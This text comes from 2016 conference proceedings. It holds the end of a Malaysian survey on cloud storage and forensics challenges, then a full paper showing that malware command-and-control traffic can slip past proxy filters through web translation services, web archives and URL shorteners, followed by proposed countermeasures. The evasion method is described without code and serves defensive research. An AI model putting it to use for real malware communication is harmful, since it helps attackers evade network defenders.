This is what 75% of participants thoughts of

ISBN: 978-1-941968-37-6 2016 SDIWC

cloud computing as it may change the way


people storing the data.
Cloud Computing as a Trend

20%
5%
75%

Result of the recession for reducing


information technology cost
Compromising security and reducing cost

Figure 2: Cloud Computing as a Trend

6.3 Cloud Storage Services Security


At the moment, most of the information
technology users do not concern about the new
technology that is being introduced to the
market, but the users are concerning about the
security of the technology [22]. According to
Figure 3, 77% of the respondents are not
interested in keeping their confidential data and
private information in the cloud storage
services, because not enough confident that any
actions from the security department can be
taken after the incident. Therefore, the majority
of respondents believe cloud storage is not
enough safe to store their personal information
there. Only 23% of respondents do not fear to
place their personal belongings like photos and
videos in cloud storage, and agree that cloud
storage services are secure places to preserve
their private data. On the other hand, even
though Malaysia has no serious security breach
issues, like data breach or photos breach from
the cloud storage services [23], but, the
majority of the cloud storages users do not
trust the cloud storages and do not keep their
personal information and documents there,
instead store their significant data in a their
personal hard disks or pen-drive and keep it all
the time with them.

84

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

market must be enough secure, rather than


offering an unsecure service to the market as it
may get court by some users if security breach
incident happens or at least lose their
customers, easily.

Cloud Storage Service's Security

23%

6.4 Cloud Forensics Challenges

77%

Participants responded on the challenges for


cloud storage forensics in Malaysia and the
results are shown in Figure 4. As it is shown in
the figure, more than one answer were
acceptable in this question and the values are in
percentage. The results show that the
respondents take it very serious as Malaysia is
not a developed country such as Singapore [24].
So, in order to become a developed country,
Malaysia not only need to focuse on the
industrialization, but also the country needs
more efforts in information technology industry
as it is also a part of the developments, as well
[25].

Yes, it is safe and secure


No, it is not secure
Figure 3: Cloud Storage Services Security

Furthermore, the minority of 23% of


participants believe in cloud storage services
providers are able to provide a secure place for
users to store their personal documents and
have a secure backup plan, if the data breach
issues occur. It can be sue to this fact that they
believe cloud storage services providers who
are offering the service and working in the

Cloud Forensics' Challenges


2
3

Limited skill set from the investigator or the


authorization power for invetigatot is being limited

Lack of jurisdiction for cloud storage forensic

15

78

2
10

Lack of international collaboration for exchange and


data access authorization
Dependencies of cloud storage provider for
investigation external chain
Lack of law/regulatory and advisory of law when
necessary

88
30

10
5

Lack of experiences

10

Lack of forensic expertise

60
15

80

15
75
14

Neutral

95

10

Significant

86
20

30

40

50

60

70

80

90

100

Very Significant

Figure 4: Cloud Forensics Challenges

ISBN: 978-1-941968-37-6 2016 SDIWC

85

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Furthermore, from the analysis of results, it is


clearly shown that 95% of respondents believe
that it is very significant challenge that due to
some regulations which limited the power of
the related departments of Malaysia has tagged
with limited skill set from the investigator or
the authorization power for investigator is being
limited. In addition, 78% of cloud storage
users agree it is very significant that
investigators have lack of jurisdiction when a
crime incident happens. Besides that, 86% of
participants agree it is very significant that there
is a lack of forensic experts in Malaysia and
also 75% believe the lack of experiences is very
significant issue in Malaysia. It means that if
any crimes related to the cloud storage happens
in Malaysia, forensics experts will not able to
investigate the issue.
The results have shown that the respondents are
no sufficiently confident or believe the
forensics experts in Malaysia can investigate
and overcome any incident, if occurs. A
majority of 80% feel lacking in laws and
regulations when advisory needed. So, this is
not a healthy thought for Malaysian who
believes the Malaysia enforce department will
not able to take any actions against the crime.
Besides that, some of the respondents believe
the recent cases happening in Malaysia is the
reason that causing the society feel not
confident for the investigation.
7 CLOUD STORAGE SERVICES
DEVELOPMENT in MALAYSIA NEXT 10
YEARS
In the Figure 5, the speculation from 76% of the
participants were agree that the cloud storage
services will be more efficient and using by
most of the population in Malaysia. This is
because the world has improving especially the
information technology is growing speedy and
Malaysia will have no choice to follow the
worlds footstep. However, 24% of the
participants are disagree and believe that cloud
storage services in Malaysia will not be
efficient in next 10 years as Malaysia, and is

ISBN: 978-1-941968-37-6 2016 SDIWC

facing obstructions from many aspects [26].


Furthermore, the authors got some thoughts and
comments from the 76% of respondents. They
believe the Information Technology will change
the culture of Malaysians living style for using
any technology products in the future. For
example, people nowadays are able to sign any
documents using an electronic signature
documents rather than get a physical signature
documents, like 20 years ago. On the other
hand, a group of 24% of respondents believe
that the governments policies may stop and
drag the growing processes or might be an
obstruction for Malaysia to achieve the Vision
2020, which has been introduced by the fourth
prime minister of Malaysia, Tun Dr. Mahathir
Mohamad. In addition, according to H.S. Borji,
Malaysia is not considered as a developed
country, because the level of industrialization
and overall standard of life style are not on par
with the most well-known developed countries
in the world, such as the United States of
America,
United
Kingdom,
Singapore,
Australia and Russia. Therefore, Malaysia still
have to do more with the country development,
and one of the priority development process can
absolutely be the Information Technology
development.
Cloud Storage Service in Malaysia
next 10 years

24%

76%

Yes, it will be used by most of the people


shortly
No, it will not be famous as it is.

Figure 5: Cloud Storage in Malaysia next 10 years

86

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

8 CONCLUSION
The analysis of results in this study has shown a
very low level of awareness for cloud storage
services amongst the Malaysians, at the
moment. It could be from many aspects of
view, culture of Malaysia or governments
policies. Furthermore, the cloud forensics raise
significant challenges of cloud storage forensics
and those challenges are not ignorable by the
related departments such as polices, forensic
investigation departments and cloud computing
experts. Hence, that is an urgent need in the
establishment of cloud storage forensics
abilities and performance, which included a set
of procedures for conducting an investigation.
However, cloud storage services are bringing
some new opportunities to the society as people
will change the way they are living and get
things done efficiency and faster. Lastly, a
preparation for Malaysia to control and
supervise the internet must be considered, as so
far no serious cloud storage services crime has
been happened or reported, in Malaysia. This
might be the thing that caused the lack of
experienced investigator. Thus, the society and
the related departments will get panicky if it
happens. Furthermore, to become a developed
country, improving and increase Information
Technology is one of the main concerns. This is
because, the IT can improve different aspects of
developments in a country. For example, the
demand of the IT is getting wide and huge as
the market shaped by the modern technologies.
Consumers are tending to search information
about products through IT platforms like
Alibaba or other online purchase websites.
9 FUTURE RECOMMENDATIONS
This study has shown high satisfaction and
responses in most of the items in the
questionnaires. Through this research, the
authors are able to know the level of awareness
for the Malaysians about cloud storage services
in this country. Furthermore, even though the
level of awareness is very low and it should be

ISBN: 978-1-941968-37-6 2016 SDIWC

a wake up call for Malaysians to know that


this is not just a trend for Information
Technology, but it is also a service that users
should know and be aware of its hidden
security issues. This study was successful to
test and get to know about the awareness of the
cloud storage services users. The authors
believe that this research would help the
relevant organizations and government
departments to spread awareness through
information sharing on cloud storage for users
to be prudent on what data they should and
what data they should not be uploading to the
cloud storage. Besides that, system developers
are encouraging to develop more forensics and
security tools for the investigators when they
really needed for investigations purpose.
REFERENCES
[1] C. Chu, Y. Ouyang and C. Jang, "Secure
data transmission with cloud computing in
heterogeneous wireless networks", Security and
Communication Networks, vol. 5, no. 12, pp.
1325-1336, 2012.
[2] S. Kamara, "Encrypted Search", XRDS:
Crossroads, The ACM Magazine for Students,
vol. 21, no. 3, pp. 30-34, 2015.
[3] M. Jouini and L. Rabai, "A Security
Framework for Secure Cloud Computing
Environments",International Journal of Cloud
Applications and Computing, vol. 6, no. 3, pp.
32-44, 2016.
[4] J. Hurwitz, M. Kaufman, F. Halper and D.
Kirsch, Hybrid Cloud For Dummies. Hoboken:
John Wiley & Sons, 2012.
[5] R. Megiba Jasmine and G. Nishibha,
"Public Cloud Secure Group Sharing and
Accessing in Cloud Computing", Indian
Journal of Science and Technology, vol. 8, no.
15, 2015.
[6] A. Pichan, M. Lazarescu and S. Soh, "Cloud
forensics: Technical challenges, solutions and
comparative analysis", Digital Investigation,
vol. 13, pp. 38-57, 2015.
[7] D. Quick and K. Choo, "Google Drive:
Forensic analysis of data remnants", Journal of

87

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Network and Computer Applications, vol. 40,


pp. 179-193, 2014.
[8] M. Taylor, J. Haggerty, D. Gresty and D.
Lamb, "Forensic investigation of cloud
computing systems", Network Security, vol.
2011, no. 3, pp. 4-10, 2011.
[9] M. Gaikwad, "A Review On Security Issues
In Cloud Computing", International Journal Of
Engineering And Computer Science, 2016.
[10] L. Dave, "Forbes Welcome", Forbes.com,
2016.
[Online].
Available:
http://www.forbes.com/sites/davelewis/2014/09
/02/icloud-data-breach-hacking-and-nudecelebrity-photos/#135f56693f69.
[Accessed:
20- May- 2016].
[11] H. Srivastava and S. Kumar, "Control
Framework
for
Secure
Cloud
Computing", Journal of Information Security,
vol. 06, no. 01, pp. 12-23, 2015.
[12] R. Megiba Jasmine and G. Nishibha,
"Public Cloud Secure Group Sharing and
Accessing in Cloud Computing", Indian
Journal of Science and Technology, vol. 8, no.
15, 2015.
[13] K. Muhammad and M. Khan,
"Augmenting Mobile Cloud Computing
through Enterprise Architecture: A Survey
Paper", International Journal of Grid and
Distributed Computing, vol. 8, no. 3, pp. 323336, 2015.
[14] U. Ismail, S. Islam, M. Ouedraogo and E.
Weippl, "A Framework for Security
Transparency in Cloud Computing", Future
Internet, vol. 8, no. 1, p. 5, 2016.
[15] C. Millard, "Forced Localization of Cloud
Services: Is Privacy the Real Driver?", IEEE
Cloud Comput., vol. 2, no. 2, pp. 10-14, 2015.
[16] P. Boshe, "Data privacy law: an
international
perspective", Information
&
Communications Technology Law, vol. 24, no.
1, pp. 118-120, 2015.
[17] K. Michael, "Securing the Cloud: Cloud
Computer
Security
Techniques
and

ISBN: 978-1-941968-37-6 2016 SDIWC

Tactics", Computers & Security, vol. 31, no. 4,


p. 633, 2012.
[18]
G.
E,
"What
Is
Cloud
Computing?", PCMag Asia, 2015. [Online].
Available: http://sea.pcmag.com/networkingcommunications-softwareproducts/2919/feature/what-is-cloudcomputing. [Accessed: 24- May- 2016].
[19] The Impact of Cloud Computing on the
Protection
of
Personal
Data
in
Malaysia", IPCSIT, vol. 45, 2013.
[20] M. Ahmed and M. Ashraf Hossain,
"Cloud Computing and Security Issues in the
Cloud",International Journal of Network
Security & Its Applications, vol. 6, no. 1, pp.
25-36, 2014.
[21] M. Workman, "New media and the
changing face of information technology use:
The importance of task pursuit, social
influence, and experience", Computers in
Human Behavior, vol. 31, pp. 111-117, 2014.
[22] B. , "PROVIDE SECURITY ABOUT
RISK
SCORE
IN
MOBILE
APPLICATIONS",International Journal of
Research in Engineering and Technology, vol.
04, no. 09, pp. 318-320, 2015.
[23] A. Moran and J. Narula, "Scorecard for
NCDs", Global Heart, vol. 8, no. 2, p. 181,
2013.
[24] J. Wonglimpiyarat, "Innovation financing
policies for entrepreneurial development
Cases of Singapore and Taiwan as newly
industrializing economies in Asia", The Journal
of High Technology Management Research,
vol. 24, no. 2, pp. 109-117, 2013.
[25] H. Borji, "Is Malaysia a developed
country? | Investopedia", Investopedia, 2015.
[Online].
Available:
http://www.investopedia.com/ask/answers/1126
15/malaysia-developed-country.asp. [Accessed:
03- Jul- 2016].
[26] "e-Security: The First Line of Digital
Defence Begins with Knowledge", MOSTI, vol.
39, 2015.

88

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Filtering Avoidance Using Web Translation Service and its Countermeasures


Ryota Suzuki, Atsuo Inomata, and Ryoichi Sasaki
Tokyo Denki University
5 Senjuasahicho, Adachi-ku, Tokyo-to 120-8551, JAPAN
[email protected]

Abstract
Recently, damage by targeted attacks has been
increasing and has also become diversified. A
targeted attack is any malicious attack targeted
toward a specific individual or organization. It has
the characteristic that damage is likely to expand
because it is hardly noticeable. Therefore, the
assumed countermeasures, such early detection and
damage reduction, are important factors for the
prevention of targeted attacks. In this paper, we
propose attack methods that are able to avoid
filtering by using web translation services, and then
we propose countermeasure methods. Also, to
evaluate our proposals, we surveyed other attack
methods, including those used in combination, such
as shortened URL services and web archive services.

Figure 1 shows targeted attacks. An attacker


sends malware to target (1). The malware infects
the victims computer, then the malware in the
victim PC communicates with the command and
control C&C server (2). And downloaded
software to expand the function of the malware
(3). The expanded malware spreads to other PCs
or servers (4). In this case, the malware usually
sends internal information to C&C server using
HTTP protocol. (5).

Keywords
Targeted
attack,
Malware,
C&C
communications, Web translation service, URL
Shortener
Figure 1. Targeted attack

Introduction

Recently, damage by targeted attacks has been


increasing and has also become diversified. A
targeted attack is any malicious attack that is
targeted toward a specific individual or
organization.
Therefore,
the
assumed
countermeasures, such as early detection and
damage reduction, are important factors for the
prevention of targeted attacks. The larger the
scale of an organization, the more difficult is the
prevention of infection. That is, it becomes more
difficult for the countermeasure in a large
organization to prevent the targeted attack [1].

ISBN: 978-1-941968-37-6 2016 SDIWC

Therefore, the assumed countermeasures, such


as early detection and damage reduction, are
important factors for the prevention of targeted
attacks. [2]. In the present study, we propose
attack methods that are successful because they
avoid filtering by using web translation services.
We assume an infection in order to consider the
countermeasures.
In this paper, we first present attack methods
that are able to avoid filtering by utilizing web
translation services. Next, we show related work
and our investigation of translation services.

89

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Then, by conducting experiments, we show that


it is possible to attack various translation
services. We also evaluate the methods of attack.
Finally, we conclude our paper.
In some web translation services, such as
Google Translate and Excite Translator, anybody
can easily translate the contents of the input web
page into another language by entering the URL
of the web page. Many web translation services
provide translation functions of the target web
page. By using a translation function, it is also
possible for anybody to retrieve the contents of
a target web page through a web translation
service without the client establishing direct
communication to the target web page. Figure 2
shows the filtering avoidance method that
allows an attacker to impersonate a destination
of communication from malware to the C&C
server via the web translation service. Thus,
filtering by such proxy servers in the
organization allows communication with C&C
servers that are prohibited and thus complicates
the discovery of suspicious communications.

Consequently, we discuss the techniques related


to the attack methods. By understanding the
techniques behind the attack methods, we can
consider countermeasures preventing the
attacks.
2

Related Work

One method of using web translation services


for an attack is Jikto [3]. Jikto uses Google
Translate for port scan in JavaScript.
BarracudaLab [4] proposed a method in which
the sender of spam e-mail uses a counter for
spam filtering that combines Google translation
and the URL shortening service. In this
approach, URL filtering in an e-mail utilizes the
fact that the URL filtering is verified by the
evaluation of linked domains. First, the URL is
shortened by a URL shortener to redirect a page
to spam. The shortened URL is displayed in the
web page translation function for Google
Translate and then the URL of the generated
page is sent by e-mail. Thus, the recipient is able
to confirm the link of the Google domain and
then filtering becomes difficult. All of these also
relate to attacks using Google Translate, but
they are not countermeasures to avoid the
filtering of C&C communications.
3

Aims of this paper

We investigate the translation services that


execute the translation for a web page and
display external web pages that would be
available for a filtering avoidance attack. Table
1 shows viewable external web page services.
Figure 2. Filtering avoidance method

Some researchers have known about this feature


of filtering avoidance, but they have not been
able to verify whether it is actually possible. In
order to evaluate the possibility, we designed an
experimental scenario that shows filtering
avoidance is indeed possible. In addition, we
conducted an experiment with shortened URL
services and other services such as the web
archive service attack method, and again
verified the possibility of a successful attack.

ISBN: 978-1-941968-37-6 2016 SDIWC

Table 1. Viewable web translation services


Service
Google Translate [5]
Bing Translator [6]
Excite Translator [7]
Yahoo! translation [8]
Infoseek translation [9]
So-net translation [10]
WorldLingo [11]
SDL (freetranslation.com) [12]

90

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

From the results of the investigation, we found


that most web services can translate and display
an external web page with an original translation
function. Furthermore, in addition to the web
translation services in Table 1, we found that
some web services can save and display a web
page from an arbitrary time such as Internet
Archive Wayback Machine [13] and Web Fish
Print [14], so we think that these services should
also be considered available to an attacker.
4

Experiments

In this paper, we set functions for determining


whether the proposed method of filtering
avoidance is applicable for targeted attacks.
Specifically, in a state where communication to
the target server by filtering is prohibited, we
confirmed that the attack method is feasible by
the following functions, which we will examine
in Sections 4.1, 4.2, and 4.3:
(1) Command reception method
(From C&C server to malware)
(2) Files reception method
(From malware to C&C server)
(3) Response transmission method
(From malware to C&C server)
Our experimental environment is as follows:
OS: Windows 10 Education
Proxy server: Squid 3.5
Web browser: Mozilla Fire Fox
Experimental program: Java
To prevent the display of a page by the cache,
we conducted an experiment with no-cache on a
proxy server and web browser. Table 2 shows
the filtering types in this experimentation.
Table 2. Filtering types
IP address filtering Block a communication to a host
of a specific IP address
Domain filtering

Block a communication to a host


for a particular domain name

URL filtering

Block a communication when a


detected target string is in a
URL.
(String of the detected target

ISBN: 978-1-941968-37-6 2016 SDIWC

specifies the IP address and the


domain name of the target host.)

4.1 Command reception method


We investigated whether the transmission of
commands from the C&C server to malware is
possible in the filtering environment. For the
transmission method of commands, the attacker
writes to a page on the web server and then the
malware receives it by connecting via the
translation service. In this experiment, we
established a normal connection via the
translation service and compared the results. We
confirmed that an attacker can retrieve
information from a server by avoiding the
filtering via the translation service.
Table 3. Filtering avoidance results by service for the
command reception
Communication
IP address Domain
URL
method
Normal

Google Translate
Excite Translator

Yahoo! translation

Infoseek translation
So-net translation

WorldLingo

SDL

Internet Archive
Web Fish Print

: Acquisition successful

: Blocked

The results of the experiment Table 3 showed


that the communication with all filtering formats
for normal connection detection are blocked.
Thus, this filtering is considered to function
properly. In contrast, in any web translation
service, successful transmission of information
from the C&C server was possible by filtering
avoidance by the IP address and the domain.
However, on many web translation services,
when URL filtering was performed, the filtering
functions by the proxy server prevented the
transmission of information from the C&C
servers. In the transmissions of storing the URL
of the web page to be translated in the GET

91

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

parameter, the URL on the web translation


service contained the C&C server domain name.
The C&C domain name is underlined in Table 4.
For other translation services, the URLs of web
pages to be translated are sent by the GET
method, so we think that URL filtering by using
GET is considered to be an effective filtering
avoidance method using translation services.
Table 4. URLs when translated
Service

URL

Excite
Translator

http://www.excite-webtl.jp/world/english/
web/?wb_url=http%3A%2F%2F
web.dendai.ac.jp%2F&wb_lp=JAEN

Google
Translate

https://translate.google.co.jp/translate?hl=j
a&sl=auto&tl=en&u=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fw
eb.dendai.ac.jp%2F

However, in the case of communication through


Google Translate, SDL, and the Internet Archive,
even if URL filtering is performed, we found the
successful transmission of information from the
C&C server by filtering avoidance. As shown in
Table 4, in the case of Google Translate and
Excite Translator, the translated target URL was
sent by the GET method, and so the C&C
server's URL in the translated URL is included.
However, when the Google Translate and SDL
communicate with the client, the GET
parameters are encrypted because of the
cryptographic secure communication by https
[15]. Therefore, we think that the filtering failed
because it was not able to confirm the content of
the GET parameter from the proxy server.
4.2 Files reception method
Then we investigated whether the transmission
of files from the C&C server is possible in our
environment. We consider two file retrieval
methods via the web translation services by
malware:
A) In the web translation services, specify the
URL of the file directly for downloading a
file.
B) Get a page that contains a link to a file and
download the file from the link on the page.

ISBN: 978-1-941968-37-6 2016 SDIWC

For approaches (A) and (B), we confirmed that


it is possible to download a file from the server
on a prohibited connection by using the
translation service. As a result, saving the file
failed for all translation services for all types of
filtering. The reasons for approaches (A) and
(B) failing are as follows. For (A), the reason
why the approach failed is the return error for
specifying the URL of the file type, e.g., not
html or php; the file type is impossible to
translate, and so the file cannot be downloaded
directly. For (B), the approach failed because,
for the web translation service, a targeted text
page of html or php is the translation transmitted,
but a file such as jpg or exe is not translated
directly to the file existing on the translated
original server. From these results for (A) and
(B), we found that the transmittable file via a
web translation service was only the targeted
translation text data, as shown in Figure 3.

Figure 3. Transmitted file formats

Thus, we consider that sending a file via a web


translation service as text data embedded into a
file such as an html file is possible for filtering
avoidance. As the method of embedding other
files into html, a technique exists to encode the
image by Base64 and embed the file as a tag
into an html file. We confirmed that the Base64
encoded image file can be downloaded by
filtering avoidance via the web translation
service. In this experiment, while the filtering is
performed, we executed the download via the
web translation service on the browser and in
the program for saving. The results are shown in
Table 5 for both the display of the image file on

92

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

the browser and the download by the program.


Table 5. Filtering avoidance results by service for the
file reception
Service
IP address Domain
URL
Google

SDL

Other service
Internet Archive

Web Fish Print

: Acquisition successful : Blocked

From Section 4.1, a service not using encrypted


communication is clearly blocked by URL
filtering, but we found that the download
avoided the filtering via the web translation
service to embed the file into html. By using the
same technique to embed malicious software
into an html file and store it by malware, we
think that it is capable of transmitting an attack
file from the C&C server. In addition, Internet
Archive carries out the download of files, even
if the file is archived; that is, Internet Archive
succeeded in successful acquisition in either a
direct specification of the URL or a link.
However, the file failed to save as in case of a
web translation service, because the Web Fish
Print service does not archive a binary file. A
file format type such as jpg or exe can be saved
to the archive on the server (without a file type
such as html or php) in Internet Archive.
Therefore, when malicious software for
attacking is used, it is also possible to realize
file transmission in an environment in which
avoidance filtering is performed when web
archive services are used.
4.3 Response transmission method
Finally, we investigated whether the response
method from malware is possible in our
environment. In targeted attacks, malware must
not only receive commands from the C&C
server, but also response to the C&C server. We
confirmed that it is possible to reply via the web
translation services. On the other hand, we
determined that the web archive services are
excluded, because archive service does not
access to original pages each time. In this

ISBN: 978-1-941968-37-6 2016 SDIWC

experiment, we set up a page that can use the


GET and POST methods on the web server, and
then we focused on the filtering domain of the
web server. With respect to the subject of the
page, we sent a write request via the web
translation services from our implemented
program and investigated whether data were
written. From Section 4.1, the filtering format
was domain URL filtering in a translation
service with or without using encrypted
communication. In the results of the experiment,
for all of the web translation services, the
writing using the GET method was successful in
avoidance filtering. Otherwise, the writing using
the POST method failed.

Figure 4. Methods available for Google Translate

As shown in Figure 4, in the GET method, the


data are included in the http request part of the
URL. This part reaches the translated original
server. On the other hand, in the POST method,
the data are included in the http header and body
part and do not exist in the URL. We think that
the information is lost at the time it is sent to the
translation service. From this result, for the
response from the malware to the C&C server,
we needed to send the data by using the GET
method. However, the GET method has
disadvantages: the amount of data that can be
transmitted is limited, and the content of the
response is recorded on the proxy server as a log
file of the URL.
4.4 Result Summary
From the results of the experiment in Sections
4.1-4.3, we found that receiving a command, a
file, and a response in the C&C server were
possible via the web translation service.
Therefore, we think that the filtering avoidance
method using web translation services can be
applied for the communication of a targeted

93

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

attack. Furthermore, for all of the web


translation services, it was possible to detect and
block the communication of a targeted attack by
sending the URL of the targeted web page with
the GET parameter, because URL filtering
cannot be avoided. However, web services on
encrypted communication such as Google
Translate, SDL, and Internet Archive encrypt the
content to send, so a countermeasure is needed
for decryption of the encrypted data before
filtering is required, in addition to the URL
filtering.
5

Experiments using a URL shortener service

5.1 Purpose
As described in the relevant research [4], it is
effective to use a URL shortener for the
avoidance filtering with web translation services.
The URL shortener generates a short URL
specifying a targeted URL. If access to a
shortened URL is given, it is moved to the web
page of the unshortened full URL by the redirect.
By using the URL shortener, the URL of the
C&C server is shortened, and access to the
shortened URL from the web translation service
is done with filtering avoidance. We conducted
an experiment to investigate whether avoidance
filtering together with a URL shortener can be
applied for a targeted attack. In this experiment,
we used the bit.ly [16] as the URL shortener.
5.2 Command transmitting method
We confirmed that the transmission of a
command is possible in an environment of
filtering combined with a URL shortener. In this
experiment, we created a shortened URL for the
filtering target and then accessed the shortened
URL via a web translation service from a web
browser. We found that filtering avoidance was
possible.
Table 6. Filtering avoidance results by translation
service with URL shorter
service
Normal

IP address

Domain

URL

Google Translate
Excite Translator

Yahoo! translation

ISBN: 978-1-941968-37-6 2016 SDIWC

Infoseek translation
So-net translation

WorldLingo

SDL

: Acquisition successful : Blocked

We found that using a URL shortener with the


avoidance of URL filtering without an
encryption service is possible as compared with
the result without the URL shortener. We think
that the URL shortener hides the targeted
domain and avoids detection when sending the
URL to a web translation service in the form of
a shortened URL. However, in the case of using
WorldLingo, the filter avoidance failed. From
these results, we think that even when using a
web translation service, it is possible to avoid
URL filtering with the combination of a URL
shortener and a web translation service.
5.3 File transmission method
For the combinations of a URL shortener and a
web translation service, we confirmed that it is
possible to send a file. As in the Section 5.2
experiment, we executed the following three
methods: specifying the URL of a file directly,
downloading a file from a link, embedding a file
into html, and sending. As in the case of the
experiment in the web translation service only,
the transmission of the file was successful only
for the method of embedding the file.
Furthermore, as in Section 5.2, avoidance
filtering using the web translation service
without encryption was successful.
5.4 Response method
With the combinations of the URL shortener and
a web translation service, we confirmed that it
was possible to respond to C&C servers in an
environment of filtering. From the results in
Section 5.3, we think that the URL with the
GET parameter via the web translation service is
needed for the response to the C&C server.
Therefore, for transmitting a response by using a
URL shortener, a URL is sent to the URL
shortener for every response and then to the web
translation service after executing the shortening.

94

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

From the experiment, we found that this


approach was successful for responding to C&C
servers for all translation services except
WorldLingo. We think that a reason for the
failure in WorldLingo is it is possible to filter
with a URL Shortener, as shown by the result of
Section 5.2.
5.5 Result Summary
From the results of the experiments in Sections
5.2-5.4, we found that the techniques combining
a URL shortener and a web translation service
were possible for transmission of a command,
transmission of a file, and replying to the C&C
server. Therefore, we think that the method with
a URL shortener can be applied to the
communication of a targeted attack. When using
the filtering avoidance method in combination
with a URL shortener, it was possible to avoid
the URL filtering that was an effective
countermeasure when using only a web
translation service, and then to communicate
about the targeted attack. However, in the
combination with the URL shortener method,
we found that it has a load disadvantage from
the URL shortening for every response to the
C&C server.
6. Countermeasures

From the Section 4 results, we found that URL


filtering was effective for the avoidance method
using a web translation service without
encrypted communication. Some kinds of
translation
services
with
encrypted
communication, such as Google Translate and
SDL, need URL filtering with an encryption
countermeasure for decoding on a proxy server.
As
a
countermeasure
for
encrypted
communication, we need filtering software [17]
[18] calling the function of https decode [19]
that stores a proxy server certificate at a
terminal and then decodes the encrypted
communication by using this certificate. For
web archive services, it is possible to combine
the
countermeasure
for
encrypted
communication and URL filtering. For the
filtering avoidance method with a URL
shortener, we found that it cannot use URL

ISBN: 978-1-941968-37-6 2016 SDIWC

filtering, as shown by the result in Section 5.


However, a countermeasure with content
filtering is possible against the use of a URL
shortener. This is because malware cannot
generate a shortened URL unless it sends the
original URL to the URL shortener. In the case
of executing the content filtering, the
countermeasure of encrypted communication is
needed because there are many services for
encrypted communication using a URL
shortener. Furthermore, we think that a
countermeasure could prohibit communication
of the translation service or URL shortener from
the perspective of operation and management.
These countermeasures have the advantage that
they can be realized only by filtering settings
but the disadvantage of inconvenience for a user.
These measures are shown in Table 7.
Table 7. Countermeasure ranges and approaches
Countermeasure
Translate https
URL
Shortener
1. URL filtering

2. https decode
3. Content filtering

4. Ban URL
shorteners

5. Ban https use in


translation services

6. Ban translation
services

Countermeasures 1, 2, and 3 in the table are


technical countermeasures that can solve the
problems.
However,
they
need
more
sophisticated and high-function filtering
software, so we have to consider the increased
costs and the burden of processing.
Countermeasures 4, 5, and 6 in the table are
countermeasures from the perspective of
operation and management, and they increase
the burden of inconvenience. To combine these
countermeasures together with an environment
of organization, it is possible to have
countermeasures against the attack method of
avoidance filtering with a web translation
service.

95

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

https://www.bing.com/translator(access 2016-04).

7. Conclusion

In this paper, we confirmed that it is possible to


perform an attack and avoid filtering with web
translation services when an attacker
communicates with the C&C server for the
targeted attack. In addition, we showed that
using a method in combination with a URL
shortener is another approach for a targeted
attack. As a countermeasure, we found that it is
effective for a web translation service without
encrypted communication to apply URL
filtering. In addition, a countermeasure of
filtering with encrypted communication of a
web translation service is effective. For a
countermeasure technique for a combination of
a URL shortener and a web translation service,
we also confirmed that content filtering is
effective.
Furthermore,
we showed
a
countermeasure to prohibit communication to an
available service for filtering avoidance as the
countermeasure of operation and management.
In future work, we will address the cost of the
countermeasures and their performance and user
convenience, and we will discuss the best
solution for every organization.

[7]

Excite Translator , http://www.excite.co.jp/world/,


(access 2016-04).

[8]

Yahoo! Translate , http://honyaku.yahoo.co.jp/, (access


2015-11).

[9]

Infoseek multi Translate,


http://translation.infoseek.ne.jp/web.html, (access
2015-11).

[10] Translate | So-net, http://www.so-net.ne.jp/translation/,


(access 2015-11).
[11] WorldLingo,
http://www.worldlingo.com/ja/products_services/worldlin
go_translator.html, (access 2015-11).
[12] SDL FreeTranslation,
https://www.freetranslation.com/ja/, (access 2015-11).
[13] Internet Archive: Digital Library of Free Books, Movies,
Music & Wayback Machine,
https://archive.org/index.php, (access 2015-11).
[14] Web Fish Print , http://megalodon.jp/, (access 2015-11).
[15] D. G. J. D. Shorter, Effectiveness of Internet Content
Filtering., Journal of Information Technology Impact.
[16] "Bitly | URL Shortener and Link Management Platform,"
[Online]. Available: https://bitly.com/. [Accessed 4 2016].
[17] i-FILTER SSL Adapteri-FILTER,
http://www.daj.jp/bs/i-filter/old/option_relation_ssl_adapt
er, (access 2015-11).

Reference

[18] Counter SSL Proxy ,


http://www.swatbrains.co.jp/csp.html, (access 2015-11).

[1]

Ryoichi Sasaki, Tetsutaro Uehara, & Takashi Matsumoto.

[19] E. Akba, Next generation filtering: Offline filtering

(2013). Present Status and Future Direction Network

enhanced proxy architecture for web content filtering.,

Forensics against Targeted Attack. Computer Security

ICIS 2016, 2008.

Symposium, 2013(4), 155-162.


[2]

Masahiro Yamada, Masanobu Morinaga, Yuki Unno,


Satoru Toru, & Masahiko Takenaka. (2013). A Detection
Method against Activities of Targeted Attack on The
Internal Network. IPSJ SIG Technical Report, 1-6.

[3]

Hoffman, B. (2008). JavaScript Malware for a Gray Goo


Tomorrow.

[4]

Spammers disguise links using Google translate ,


https://barracudalabs.com/2013/03/spammers-disguise-lin
ks-using-google-translate/, (access 2015-11).

[5]

Google Translate , https://translate.google.co.jp/,


(access 2016-04).

[6]

Bing Translator,

ISBN: 978-1-941968-37-6 2016 SDIWC

96

